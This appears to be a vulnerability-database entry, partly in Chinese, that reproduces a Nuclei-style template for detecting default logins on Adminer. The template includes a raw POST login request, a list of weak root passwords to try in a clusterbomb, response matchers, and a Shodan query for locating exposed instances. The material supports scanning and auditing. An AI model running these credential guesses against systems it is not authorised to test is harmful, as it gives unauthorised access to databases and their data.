漏洞描述
Adminer contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
adminer-default-login: Adminer Default Login - Detect
PoC代码[已公开]
id: adminer-default-login
info:
name: Adminer Default Login - Detect
author: j4vaovo
severity: high
description: |
Adminer contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://www.adminer.org
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
verified: true
max-request: 5
shodan-query: http.title:adminer
tags: default-login,adminer,vuln
http:
- raw:
- |
POST /index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
auth[driver]=server&auth[server]=&auth[username]={{username}}&auth[password]={{password}}&auth[db]=
attack: clusterbomb
payloads:
username:
- root
password:
- root
- toor
- 123
- 123456
- 123456789
host-redirects: true
max-redirects: 1
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Create database'
- 'Privileges'
- 'Process list'
- 'Adminer'
condition: and
case-insensitive: true
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200
# digest: 490a0046304402205b848aad03ca0a0d2e657a49ff3d985391a7983e22787c346f10617182d84fdd022068cec93e1cab782d87414f428dd955ac135ea3a4b023b3e35e8c96fdec294643:922c64590222798bb761d5b6d8e72950